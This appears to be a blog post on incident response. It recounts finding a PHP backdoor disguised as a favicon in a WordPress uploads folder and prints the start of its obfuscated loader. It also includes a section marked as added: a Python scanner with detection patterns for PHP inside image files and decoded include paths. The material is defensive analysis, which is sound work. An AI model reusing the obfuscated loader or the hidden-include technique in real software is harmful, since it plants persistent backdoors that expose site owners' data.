I decided to write this article right away after an incident I had while securing one of my client's websites, which was getting re-infected again and again a few days after being cleaned.

What is a backdoor?

In simple terms, a backdoor is malicious hidden code that allows an attacker to gain unauthorized access to a system, program, application or website. Check the Wikipedia definition here.

A strange icon file where it was not supposed to be

After cleaning the infections and stopping their propagation, I was confirming that the WordPress folder and file structure was fine (to make sure there was no data loss). Everything was OK, but I found an icon file named favicon_11axx.ico in the wp-content/uploads/ folder. It was a bit strange that an icon file was there, because when you have a paid theme, it usually has a configuration panel where you upload the logo and icon (also known as favicon), and if this was the site icon, the file should have been uploaded to a path like wp-content/uploads/{year}/{month}/(unknown), as per the default WordPress uploads path. So I tried to download the file to check it further, and my antivirus (ESET Security) immediately deleted the file, throwing an alert saying it was infected with a PHP trojan (the hidden backdoor I was looking for).

I deactivated my antivirus for 10 minutes, then downloaded the file and sent it to virustotal.com, where I got this:

Then I opened the file with my text editor, Sublime Text (at this point it was obvious the file was not an icon or an image), and I found the following at the beginning of the file:

if (!defined('ALREADY_RUN_1bc29b36342a82aaf665878535618')){
define('ALREADY_RUN_1bc29b36342a82aaf665878535618', 1);
$wcoydw = 8335; function azyjngoo($dygol, $ruwyh){$qzzevn = ''; for($i=0; $i < strlen($dygol); $i++){$qzzevn .= isset($ruwyh[$dygol[$i]]) ? $ruwyh[$dygol[$i]] : $dygol[$i];} $zerbylhmp="base" . "64_decode";return $zerbylhmp($qzzevn);} $ixqservz = 'wOF17p0Z3k6L1VYsgMtsYNoZ3sgc1pjkhilLoF17pZq'. '3k6LVoZ3VeIJM9Z8MEM9yl17dw204XCa0J8FY1ygZCzWJ3kWICFTVfYtYN6XCTY9m1'. 
//more code here

It was PHP code inside an image (an icon file in this case).

And how was this malicious code executed automatically?

With PHP you can do include('{path}/(unknown)'); and the code in that file will be read, included and executed, because it's PHP code (the file extension does not matter much in this case). And where was this include code? This was the second part of the infection, which usually comes obfuscated and/or encoded, like the following example (taken from Google):


Part of the string above may be encoded, but I can quickly tell that it's a PHP include. If you decode the include path, it should lead you to the trojan/backdoor or some other hidden infection (in this case, it was calling the fake favicon.ico file).

Pretty clever, huh? Well, maybe not that much, but as the malware was inside an image file, some scanners couldn't find it 🙁

These hidden backdoors can keep infecting your website with new malware and they can grant control over your data to an attacker.
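As an added example (not code from the original post), here is a small Python scanner that looks for the two halves of this infection: PHP source hiding inside files with an image extension, and include()/require() calls whose path is built at runtime with base64_decode() or a similar decoder. The indicator patterns, the sample files and the file names are constructed for the demo; they are heuristics for picking files to review by hand, not proof of infection.

```python
import pathlib
import re
import tempfile

# Extensions that should hold media bytes, never PHP source.
MEDIA_EXT = {".ico", ".png", ".jpg", ".jpeg", ".gif", ".webp", ".svg"}

# Heuristic indicators (constructed) modelled on the favicon backdoor above; they flag suspects for review.
INDICATORS = {
    "php-open-tag": re.compile(rb"<\?php\b|<\?="),
    "split-base64_decode": re.compile(rb"""['"]base['"]\s*\.\s*['"]64_decode['"]"""),
    "include-of-decoded-path": re.compile(
        rb"\b(?:include|require)(?:_once)?\s*\(?\s*(?:base64_decode|gzinflate|str_rot13)\s*\("),
}

def scan_file(path):
    """Return the names of the indicators that fire for one file (path is a pathlib.Path)."""
    data = path.read_bytes()  # fine for an uploads tree; cap the read if you scan huge files
    hits = []
    for name, pattern in INDICATORS.items():
        # A PHP open tag is normal in a .php file but not inside an icon or image.
        if name == "php-open-tag" and path.suffix.lower() not in MEDIA_EXT:
            continue
        if pattern.search(data):
            hits.append(name)
    return hits

def scan_tree(root):
    """Walk a directory such as wp-content/ and map relative path -> hits."""
    root = pathlib.Path(root)
    findings = {}
    for path in root.rglob("*"):
        hits = scan_file(path) if path.is_file() else []
        if hits:
            findings[path.relative_to(root).as_posix()] = hits
    return findings

def demo():
    """Constructed tree: a fake favicon carrying PHP, a clean icon, and a theme file with a decoded include."""
    root = pathlib.Path(tempfile.mkdtemp())
    samples = {  # the base64 string decodes to ../uploads/favicon_11axx.ico
        "uploads/favicon_11axx.ico": b"<?php if(!defined('ALREADY_RUN_X')){$f=\"base\" . \"64_decode\";}",
        "uploads/favicon.ico": b"\x00\x00\x01\x00\x01\x00\x10\x10" + b"\x00" * 64,
        "themes/x/functions.php": b"<?php include(base64_decode('Li4vdXBsb2Fkcy9mYXZpY29uXzExYXh4Lmljbw=='));",
    }
    for rel, content in samples.items():
        target = root / rel
        target.parent.mkdir(parents=True, exist_ok=True)
        target.write_bytes(content)
    return scan_tree(root)
```

Running scan_tree("wp-content") on a real site lists every file that matches; the fake favicon fires on both the PHP tag and the split "base" . "64_decode" name, the real icon fires on nothing, and the theme file is flagged only for its decoded include path.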

Here's a related article from Sucuri: https://blog.sucuri.net/2014/12/analyzing-the-wordpress-soaksoak-favicon-backdoor.html

My recommendations

  • It is always a good idea to have a firewall that blocks untrusted requests to the site and database.
  • Always make fully working backups on your side and do not rely entirely on your hosting's free backup tool (I tell you this from experience).
  • Keep your themes and plugins updated, in the case of WordPress-based sites.
  • DO NOT install nulled plugins, themes or paid code snippets.
  • Always research a bit on Google about what you're about to install on your website / application (whether it is WordPress, another CMS or a framework).